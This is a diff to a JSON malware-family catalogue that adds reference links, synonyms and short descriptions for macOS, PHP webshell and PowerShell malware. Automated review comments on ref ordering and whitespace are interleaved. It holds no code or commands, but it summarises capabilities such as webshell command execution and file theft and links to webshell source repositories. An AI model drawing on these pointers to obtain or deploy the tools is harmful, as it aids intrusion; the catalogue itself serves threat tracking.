+ "https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/",
+ "https://reverse.put.as/2020/09/26/the-finfisher-tales-chapter-1/",
+ "https://objective-see.com/blog/blog_0x4F.html",
+ "https://objective-see.com/blog/blog_0x5F.html",
+ "https://netzpolitik.org/2020/our-criminal-complaint-german-state-malware-company-finfisher-raided/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "89ce536c-03b9-4f69-83ce-723f26b36494",
+ "value": "FinFisher (OS X)"
+ },
 {
 "description": "",
 "meta": {
@@ -2778,9 +5622,12 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.flashback", "http://contagiodump.blogspot.com/2012/04/osxflashbacko-sample-some-domains.html", "https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed", + "https://en.wikipedia.org/wiki/Flashback_(Trojan)", "http://contagiodump.blogspot.com/2012/04/osxflashbackk-sample-mac-os-malware.html" ], - "synonyms": [], + "synonyms": [ + "FakeFlash" + ], "type": [] }, "uuid": "f92b5355-f398-4f09-8bcc-e06df6fe51a0", @@ -2792,11 +5639,11 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.fruitfly", "https://www.documentcloud.org/documents/4346338-Phillip-Durachinsky-Indictment.html", - "https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/", "https://arstechnica.com/security/2017/07/perverse-malware-infecting-hundreds-of-macs-remained-undetected-for-years/", + "https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/", "https://www.virusbulletin.com/virusbulletin/2017/11/vb2017-paper-offensive-malware-analysis-dissecting-osxfruitflyb-custom-cc-server/", - "https://arstechnica.com/security/2017/01/newly-discovered-mac-malware-may-have-circulated-in-the-wild-for-2-years/", - "https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Patrick-Wardle-Offensive-Malware-Analysis-Fruit-Fly-UPDATED..pdf" + "https://objectivebythesea.com/v3/talks/OBTS_v3_tReed.pdf", + "https://arstechnica.com/security/2017/01/newly-discovered-mac-malware-may-have-circulated-in-the-wild-for-2-years/" ], "synonyms": [ "Quimitchin" 
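Review bot: The FruitFly hunk removes and re-adds `https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/` and `https://arstechnica.com/security/2017/01/newly-discovered-mac-malware-may-have-circulated-in-the-wild-for-2-years/` at different positions, so the diff reads as a reorder and hides the two real changes (the DEF CON slide deck dropped, the OBTS talk added). The same ordering churn is in the Keydnap hunk on L119, OceanLotus on L121, X-Agent on L126 and BONDUPDATER on L130, and it makes reference removals, the part a reviewer most wants to see, hard to spot. Sorting each `refs` array in the import step before writing the file (keeping the Malpedia details URL first if that position is intentional) would make future syncs show only genuine additions and deletions.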
@@ -2806,6 +5653,24 @@ "uuid": "a517cdd1-6c82-4b29-bdd2-87e281227597", "value": "FruitFly" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.gmera", + "https://blog.trendmicro.com/trendlabs-security-intelligence/mac-malware-that-spoofs-trading-app-steals-user-information-uploads-it-to-website/", + "https://objective-see.com/blog/blog_0x53.html", + "https://www.welivesecurity.com/2020/07/16/mac-cryptocurrency-trading-application-rebranded-bundled-malware/" + ], + "synonyms": [ + "Kassi", + "StockSteal" + ], + "type": [] + }, + "uuid": "1c65cf4e-5df4-4d56-a414-7b05f00814ba", + "value": "Gmera" + }, { "description": "", "meta": { @@ -2820,10 +5685,11 @@ "value": "HiddenLotus" }, { - "description": "", + "description": "The threat was a multi-stage malware displaying a decoy that appeared to the victim as a Chinese language article on the long-running dispute over the Diaoyu Islands; an array of erotic pictures; or images of Tibetan organisations. It consisted of two stages: Revir was the dropper/downloader and Imuler was the backdoor capable of the following operations:\r\n\r\n- capture screenshots\r\n- exfiltrate files to a remote computer\r\n- send various information about the infected computer\r\n- extract ZIP archive\r\n- download files from a remote computer and/or the Internet\r\n- run executable files", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.imuler", + "https://www.welivesecurity.com/2012/03/16/osximuler-updated-still-a-threat-on-mac-os-x/", "http://contagiodump.blogspot.com/2012/11/group-photoszip-osxrevir-osximuler.html", "https://nakedsecurity.sophos.com/2012/11/13/new-mac-trojan/" ], 
@@ -2835,6 +5701,24 @@ "uuid": "261fd543-60e4-470f-af28-7a9b17ba4759", "value": "iMuler" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.janicab", + "https://archive.f-secure.com/weblog/archives/00002576.html", + "https://securelist.com/deathstalker-mercenary-triumvirate/98177/", + "https://securelist.com/apt-trends-report-q3-2020/99204/", + "https://www.macmark.de/blog/osx_blog_2013-08-a.php", + "https://blog.avast.com/2013/07/22/multisystem-trojan-janicab-attacks-windows-and-macosx-via-scripts/", + "https://sec0wn.blogspot.com/2018/12/powersing-from-lnk-files-to-janicab.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "01325d85-297f-40d5-b829-df9bd996af5a", + "value": "Janicab" + }, { "description": "", "meta": { @@ -2855,9 +5739,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.keydnap", - "https://objective-see.com/blog/blog_0x16.html", + "https://www.welivesecurity.com/2016/08/30/osxkeydnap-spreads-via-signed-transmission-application/", + "https://github.com/eset/malware-ioc/tree/master/keydnap", "http://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/", - "https://github.com/eset/malware-ioc/tree/master/keydnap" + "https://objective-see.com/blog/blog_0x16.html" ], "synonyms": [], "type": [] @@ -2934,6 +5819,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.macdownloader", + "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy", "https://iranthreats.github.io/resources/macdownloader-macos-malware/" ], "synonyms": [], 
@@ -3008,13 +5894,29 @@ "uuid": "7759534c-3298-42e9-adab-896d7e507f4f", "value": "MaMi" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.manuscrypt", + "https://twitter.com/BitsOfBinary/status/1321488299932983296", + "https://twitter.com/BitsOfBinary/status/1337330286787518464", + "https://www.anquanke.com/post/id/223817" + ], + "synonyms": [], + "type": [] + }, + "uuid": "f85c3ec9-81f0-4dee-87e6-b3f6b235bfe7", + "value": "Manuscrypt" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.mokes", "https://securelist.com/blog/research/75990/the-missing-piece-sophisticated-os-x-backdoor-discovered/", - "https://objective-see.com/blog/blog_0x16.html" + "https://objective-see.com/blog/blog_0x16.html", + "https://objective-see.com/blog/blog_0x53.html" ], "synonyms": [], "type": [] 
@@ -3040,11 +5942,16 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.oceanlotus", - "https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update", "https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/", - "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", "https://researchcenter.paloaltonetworks.com/2017/06/unit42-new-improved-macos-backdoor-oceanlotus/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/" + "https://about.fb.com/news/2020/12/taking-action-against-hackers-in-bangladesh-and-vietnam/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/", + "https://www.trendmicro.com/en_us/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html", + "https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update", + "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", + "https://labs.sentinelone.com/apt32-multi-stage-macos-trojan-innovates-on-crimeware-scripting-technique/", + "https://tradahacking.vn/%C4%91%E1%BB%A3t-r%E1%BB%93i-t%C3%B4i-c%C3%B3-%C4%91%C4%83ng-m%E1%BB%99t-status-xin-d%E1%BA%A1o-tr%C3%AAn-fb-may-qu%C3%A1-c%C5%A9ng-c%C3%B3-v%C3%A0i-b%E1%BA%A1n-nhi%E1%BB%87t-t%C3%ACnh-g%E1%BB%ADi-cho-537b19ee3468", + "https://github.com/AmnestyTech/investigations/tree/master/2021-02-24_vietnam" ], "synonyms": [], "type": [] 
@@ -3068,6 +5975,19 @@ }, { "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.osaminer", + "https://labs.sentinelone.com/fade-dead-adventures-in-reversing-malicious-run-only-applescripts/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "89d0c423-c4ff-46e8-8c79-ea5e974e53e7", + "value": "OSAMiner" + }, + { + "description": "This crypto-ransomware for macOS was caught spreading via BitTorrent distribution sites in February 2017, masquerading as 'Patcher', an application used for pirating popular software like Adobe Premiere Pro or Microsoft Office for Mac.\r\n\r\nThe downloaded torrent contained an application bundle in the form of a single zip file. After launching the fake application, the main window of the fake cracking tool was displayed.\r\n\r\nThe file encryption process was launched after the misguided victim clicked 'Start'. Once executed, the ransomware generated a random 25-character string and set it as the key for RC4 encryption of all of the user's files. It then demanded ransom in Bitcoin, as instructed in the 'README!' .txt file copied all over the user's directories.\r\n\r\nDespite the instructions being quite thorough, Patcher lacked the functionality to communicate with any C&C server, and therefore made it impossible for its operators to decrypt affected files. The randomly generated encryption key was also too long to be guessed via a brute-force attack, leaving the encrypted data unrecoverable in a reasonable amount of time.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.patcher", 
@@ -3083,7 +6003,7 @@ "value": "Patcher" }, { - "description": "Backdoor as a fork of OpenSSH_6.0 with no logging, and “-P” and “-z” hidden command arguments. “PuffySSH_5.8p1” string.", + "description": "Backdoor as a fork of OpenSSH_6.0 with no logging, and \u201c-P\u201d and \u201c-z\u201d hidden command arguments. \u201cPuffySSH_5.8p1\u201d string.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.pintsized", @@ -3102,6 +6022,7 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.pirrit", "http://www.zdnet.com/article/maker-of-sneaky-mac-adware-sends-security-researcher-cease-and-desist-letter/", "http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "https://www.cybereason.com/hubfs/Content%20PDFs/OSX.Pirrit%20Part%20III%20The%20DaVinci%20Code.pdf" ], "synonyms": [], @@ -3152,8 +6073,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.retefe", "http://blog.checkpoint.com/2017/04/27/osx-malware-catching-wants-read-https-traffic/", + "https://www.proofpoint.com/us/threat-insight/post/2019-return-retefe", "https://www.govcert.admin.ch/blog/33/the-retefe-saga", - "http://www.brycampbell.co.uk/new-blog/2017/4/30/retefe-and-osxdok-one-and-the-same", "https://blog.checkpoint.com/2017/07/13/osxdok-refuses-go-away-money/" ], "synonyms": [ 
@@ -3164,6 +6085,34 @@ "uuid": "80acc956-d418-42e3-bddf-078695a01289", "value": "Dok" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.shlayer", + "https://threatpost.com/shlayer-mac-youtube-wikipedia/152146/", + "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", + "https://securelist.com/shlayer-for-macos/95724/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c3ee82df-a004-4c68-89bd-eb4bb2dfc803", + "value": "Shlayer" + }, + { + "description": "According to Red Canary, Silver Sparrow is an activity cluster that includes a binary compiled to run on Apple\u2019s new M1 chips but has been distributed without payload so far.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.silver_sparrow", + "https://redcanary.com/blog/clipping-silver-sparrows-wings/#technical-analysis" + ], + "synonyms": [], + "type": [] + }, + "uuid": "f6a7aeeb-fcc5-4d26-9eab-c0b6e2819a6c", + "value": "Silver Sparrow" + }, { "description": "General purpose backdoor", "meta": { @@ -3190,6 +6139,20 @@ "uuid": "59d4a2f3-c66e-4576-80ab-e04a4b0a4317", "value": "Tsunami (OS X)" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.unidentified_001", + "https://objective-see.com/blog/blog_0x51.html", + "https://securelist.com/operation-applejeus-sequel/95596/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "1c96f6b9-6b78-4137-9d5f-aa5575f80daa", + "value": "Unidentified macOS 001 (UnionCryptoTrader)" + }, { "description": "", "meta": { 
@@ -3204,6 +6167,35 @@ "uuid": "13173d75-45f0-4183-8e18-554a5781405c", "value": "Uroburos (OS X)" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.vigram", + "https://twitter.com/ConfiantIntel/status/1351559054565535745" + ], + "synonyms": [ + "WizardUpdate" + ], + "type": [] + }, + "uuid": "021e2fb4-1744-4fde-8d59-b247f1b34062", + "value": "Vigram" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.watchcat", + "https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/", + "https://objective-see.com/blog/blog_0x5F.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a73468d5-2dee-4828-8bbb-c37ea9295584", + "value": "WatchCat" + }, { "description": "", "meta": { @@ -3212,7 +6204,10 @@ "https://objective-see.com/blog/blog_0x3D.html", "https://objective-see.com/blog/blog_0x3B.html", "https://www.forbes.com/sites/thomasbrewster/2018/08/30/apple-mac-loophole-breached-in-middle-east-hacks/", - "https://gsec.hitb.org/materials/sg2018/D1%20COMMSEC%20-%20In%20the%20Trails%20of%20WINDSHIFT%20APT%20-%20Taha%20Karim.pdf" + "https://posts.specterops.io/introducing-venator-a-macos-tool-for-proactive-detection-34055a017e56", + "https://gsec.hitb.org/materials/sg2018/D1%20COMMSEC%20-%20In%20the%20Trails%20of%20WINDSHIFT%20APT%20-%20Taha%20Karim.pdf", + "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1554718868.pdf", + "https://www.virusbulletin.com/virusbulletin/2020/04/vb2019-paper-cyber-espionage-middle-east-unravelling-osxwindtail/" ], "synonyms": [], "type": [] @@ -3225,8 +6220,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.winnti", - "https://401trg.pw/winnti-evolution-going-open-source/", - " https://401trg.pw/an-update-on-winnti/" + "https://401trg.pw/winnti-evolution-going-open-source/" ], "synonyms": [], "type": [] 
@@ -3254,6 +6248,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.wirenet", "http://contagiodump.blogspot.com/2012/12/aug-2012-backdoorwirenet-osx-and-linux.html", + "https://objective-see.com/blog/blog_0x43.html", "https://news.drweb.com/show/?i=2679&lng=en&c=14" ], "synonyms": [], @@ -3267,9 +6262,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xagent", - "http://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xagent-macos-tool/", "https://twitter.com/PhysicalDrive0/status/845009226388918273", - "https://download.bitdefender.com/resources/files/News/CaseStudies/study/143/Bitdefender-Whitepaper-APT-Mac-A4-en-EN-web.pdf" + "http://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xagent-macos-tool/", + "https://download.bitdefender.com/resources/files/News/CaseStudies/study/143/Bitdefender-Whitepaper-APT-Mac-A4-en-EN-web.pdf", + "https://www.secureworks.com/research/threat-profiles/iron-twilight" ], "synonyms": [], "type": [] @@ -3277,6 +6273,21 @@ "uuid": "858f4396-8bc9-4df8-9370-490bbb3b4535", "value": "X-Agent (OS X)" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset", + "https://documents.trendmicro.com/assets/pdf/XCSSET_Technical_Brief.pdf", + "https://blog.trendmicro.com/trendlabs-security-intelligence/xcsset-mac-malware-infects-xcode-projects-performs-uxss-attack-on-safari-other-browsers-leverages-zero-day-exploits/", + "https://objective-see.com/blog/blog_0x5F.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "041aee7f-cb7a-4199-9fe5-494801a18273", + "value": "XCSSET" + }, { "description": "", "meta": { 
@@ -3296,7 +6307,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.yort", - "https://securelist.com/cryptocurrency-businesses-still-being-targeted-by-lazarus/90019/" + "https://securelist.com/cryptocurrency-businesses-still-being-targeted-by-lazarus/90019/", + "https://objective-see.com/blog/blog_0x53.html" ], "synonyms": [], "type": [] @@ -3304,11 +6316,28 @@ "uuid": "725cd3eb-1025-4da3-bcb1-a7b6591c632b", "value": "Yort" }, + { + "description": "Ani-Shell is a simple PHP shell with some unique features like Mass Mailer, a simple Web-Server Fuzzer, Dosser, Back Connect, Bind Shell, Back Connect, Auto Rooter etc.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/php.anishell", + "https://github.com/tennc/webshell/tree/master/php/Ani-Shell", + "http://ani-shell.sourceforge.net/" + ], + "synonyms": [ + "anishell" + ], + "type": [] + }, + "uuid": "7ef3c0fd-8736-47b1-8ced-ca7bf6d27471", + "value": "Ani-Shell" + }, { "description": "Antak is a webshell written in ASP.Net which utilizes PowerShell.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/php.antak", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", "https://github.com/samratashok/nishang/blob/master/Antak-WebShell/antak.aspx", "http://www.labofapenetrationtester.com/2014/06/introducing-antak.html" ], 
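Review bot: The new Ani-Shell description lists `Back Connect` twice (`… Back Connect, Bind Shell, Back Connect, Auto Rooter …`), which looks like an upstream copy error rather than two distinct features. The text comes from the Malpedia API, so the correction belongs upstream; a one-line note in the commit description or an issue against Malpedia would keep the next sync from re-importing it.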
@@ -3318,12 +6347,59 @@ "uuid": "88a71ca8-d99f-416a-ad29-5af12212008c", "value": "ANTAK" }, + { + "description": "C99shell is a PHP backdoor that provides a lot of functionality, for example:\r\n\r\n\r\n* run shell commands;\r\n* download/upload files from and to the server (FTP functionality);\r\n* full access to all files on the hard disk;\r\n* self-delete functionality.\r\n\r\n", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/php.c99", + "https://bartblaze.blogspot.com/2015/03/c99shell-not-dead.html" + ], + "synonyms": [ + "c99" + ], + "type": [] + }, + "uuid": "cd1b8ec2-dbbd-4e73-b9a7-1bd1287a68f2", + "value": "c99shell" + }, + { + "description": "FireEye discovered the DEWMODE webshell starting mid-December 2020 after exploitation of zero-day vulnerabilities in Accellion's File Transfer Appliance.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/php.dewmode", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-055a", + "https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html", + "https://www.accellion.com/sites/default/files/trust-center/accellion-fta-attack-mandiant-report-full.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a782aac8-168d-4691-a182-237d7d473e21", + "value": "DEWMODE" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/php.ensikology", + "https://blog.trendmicro.com/trendlabs-security-intelligence/ensiko-a-webshell-with-ransomware-capabilities/" + ], + "synonyms": [ + "Ensiko" + ], + "type": [] + }, + "uuid": "dfd8deac-ce86-4a22-b462-041c19d62506", + "value": "Ensikology" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/php.pas", "https://www.us-cert.gov/security-publications/GRIZZLY-STEPPE-Russian-Malicious-Cyber-Activity", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf", + 
"https://www.domaintools.com/resources/blog/centreon-to-exim-and-back-on-the-trail-of-sandworm", "https://blog.erratasec.com/2016/12/some-notes-on-iocs.html" ], "synonyms": [], @@ -3332,12 +6408,24 @@ "uuid": "e6a40fa2-f79f-40e9-89d3-a56984bc51f7", "value": "PAS" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/php.redhat_hacker", + "https://github.com/xl7dev/WebShell/blob/master/Asp/RedHat%20Hacker.asp" + ], + "synonyms": [], + "type": [] + }, + "uuid": "e94a5b44-f2c2-41dc-8abb-6de69eb38241", + "value": "RedHat Hacker WebShell" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/php.wso", - "https://github.com/wso-shell", "https://securelist.com/energetic-bear-crouching-yeti/85345/" ], "synonyms": [ 
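Review bot: The c99shell description in the hunk that starts on L128 carries three leading and two trailing CRLF sequences (`for example:\r\n\r\n\r\n* run shell commands;` and `self-delete functionality.\r\n\r\n"`), which render as stray blank lines wherever the cluster is displayed. Trimming surrounding whitespace from `description` in the import step (the equivalent of `description.strip()`) would normalize this entry and any other CRLF-padded text without touching upstream data.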
@@ -3366,25 +6454,95 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.bondupdater", - "https://www.boozallen.com/s/insight/blog/dark-labs-discovers-apt34-malware-variants.html?cid=spo-csatb-2", + "https://blog.0day.rocks/hacking-back-and-influence-operations-85cd52c1e933", + "https://marcoramilli.com/2019/05/02/apt34-glimpse-project/", + "https://unit42.paloaltonetworks.com/behind-the-scenes-with-oilrig/", "https://www.zdnet.com/article/source-code-of-iranian-cyber-espionage-tools-leaked-on-telegram/", + "https://nsfocusglobal.com/apt34-event-analysis-report/", "https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-uses-updated-bondupdater-target-middle-eastern-government/", - "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/" + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/", + "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy", + "https://www.boozallen.com/s/insight/blog/dark-labs-discovers-apt34-malware-variants.html?cid=spo-csatb-2", + "https://ironnet.com/blog/chirp-of-the-poisonfrog/", + "https://www.netscout.com/blog/asert/tunneling-under-sands" ], "synonyms": [ - "Glimpse" + "Glimpse", + "Poison Frog" ], "type": [] }, "uuid": "99600ba5-30a0-4ac8-8583-6288760b77c3", "value": "BONDUPDATER" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.cashy200", + "https://unit42.paloaltonetworks.com/more-xhunt-new-powershell-backdoor-blocked-through-dns-tunnel-detection/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "7373c789-2dc2-4867-9c60-fa68f8d971a2", + "value": "CASHY200" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.flowerpower", + 
"https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://vblocalhost.com/uploads/VB2020-46.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "6f0f034a-13f1-432d-bc70-f78d7f27f46f", + "value": "FlowerPower" + }, + { + "description": "Loader used to deliver FRat (see family windows.frat)", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.frat_loader", + "https://github.com/jeFF0Falltrades/IoCs/blob/master/Broadbased/frat.md" + ], + "synonyms": [], + "type": [] + }, + "uuid": "385a3dca-263d-46be-b84d-5dc09ee466d9", + "value": "FRat Loader" + }, + { + "description": "The malware ftcode is a ransomware which encrypts files and changes their extension into .FTCODE. It later asks for a ransom in order to release the decryption key, mandatory to recover your files. It is infamous for attacking Italy pretending to be a notorious telecom provider asking for due payments.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.ftcode", + "https://www.kpn.com/security-blogs/FTCODE-taking-over-a-portion-of-the-botnet.htm", + "https://www.zscaler.com/blogs/research/ftcode-ransomware--new-version-includes-stealing-capabilities", + "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/Unknown/2020-06-22/Analysis.md", + "https://www.certego.net/en/news/malware-tales-ftcode/", + "https://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html", + "https://www.certego.net/en/news/ftdecryptor-a-simple-password-based-ftcode-decryptor/", + "https://nakedsecurity.sophos.com/2013/03/05/russian-ransomware-windows-powershell/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "f727a05e-c1cd-4e95-b0bf-2a4bb64aa850", + "value": "FTCODE" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.ghostminer", - "https://blog.minerva-labs.com/ghostminer-cryptomining-malware-goes-fileless" + 
"https://blog.minerva-labs.com/ghostminer-cryptomining-malware-goes-fileless", + "https://blog.trendmicro.com/trendlabs-security-intelligence/fileless-cryptocurrency-miner-ghostminer-weaponizes-wmi-objects-kills-other-cryptocurrency-mining-payloads/", + "https://research.checkpoint.com/malware-against-the-c-monoculture/" ], "synonyms": [], "type": [] 
@@ -3392,13 +6550,60 @@
 "uuid": "0db05333-2214-49c3-b469-927788932aaa",
 "value": "GhostMiner"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.jasperloader",
+ "https://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html",
+ "https://blog.talosintelligence.com/2019/04/jasperloader-targets-italy.html",
+ "https://blog.talosintelligence.com/2019/05/sorpresa-jasperloader.html",
+ "https://blog.threatstop.com/upgraded-jasperloader-infecting-machines"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "286a14a1-7113-4bed-97ce-8db41b312a51",
+ "value": "JasperLoader"
+ },
+ {
+ "description": "According to Bleeping Computer and Vitali Kremez, LightBot is a compact reconnaissance tool suspected to be used to identify high-value targets for potential follow-up ransomware attacks.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.lightbot",
+ "https://twitter.com/VK_Intel/status/1329511151202349057",
+ "https://www.bleepingcomputer.com/news/security/lightbot-trickbot-s-new-reconnaissance-malware-for-high-value-targets/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "319c4b4f-2901-412c-8fa5-70be75ba51cb",
+ "value": "LightBot"
+ },
+ {
+ "description": "The author describes Octopus as an \"open source, pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.\"\r\n\r\nIt is different from the malware win.octopus written in Delphi and attributed to DustSquad by Kaspersky Labs.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.octopus",
+ "https://resources.malwarebytes.com/files/2021/02/LazyScripter.pdf",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf",
+ "https://isc.sans.edu/diary/26918",
+ "https://github.com/mhaskar/Octopus"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "c3ca7a89-a885-444a-8642-31019b34b027",
+ "value": "Octopus (Powershell)"
+ },
 {
"description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.oilrig",
 "https://www.vkremez.com/2018/03/investigating-iranian-threat-group.html",
- "https://twitter.com/MJDutch/status/1074820959784321026?s=19"
+ "https://twitter.com/MJDutch/status/1074820959784321026?s=19",
+ "https://threatpost.com/oilrig-apt-unique-backdoor/157646/"
 ],
 "synonyms": [],
 "type": []
@@ -3420,11 +6625,40 @@
 "uuid": "4df1b257-c242-46b0-b120-591430066b6f",
 "value": "POSHSPY"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerbrace",
+ "https://norfolkinfosec.com/osint-reporting-on-dprk-and-ta505-overlap/",
+ "https://technical.nttsecurity.com/post/102fnog/targeted-trickbot-activity-drops-powerbrace-backdoor"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "7b334343-0045-4d65-b28a-ebf912c7aafc",
+ "value": "PowerBrace"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerpepper",
+ "https://securelist.com/what-did-deathstalker-hide-between-two-ferns/99616/",
+ "https://twitter.com/InQuest/status/1285295975347650562"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "6544c75b-809f-4d31-a235-8906d4004828",
+ "value": "PowerPepper"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerpipe",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
 "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
 ],
 "synonyms": [],
@@ -3433,11 +6667,39 @@
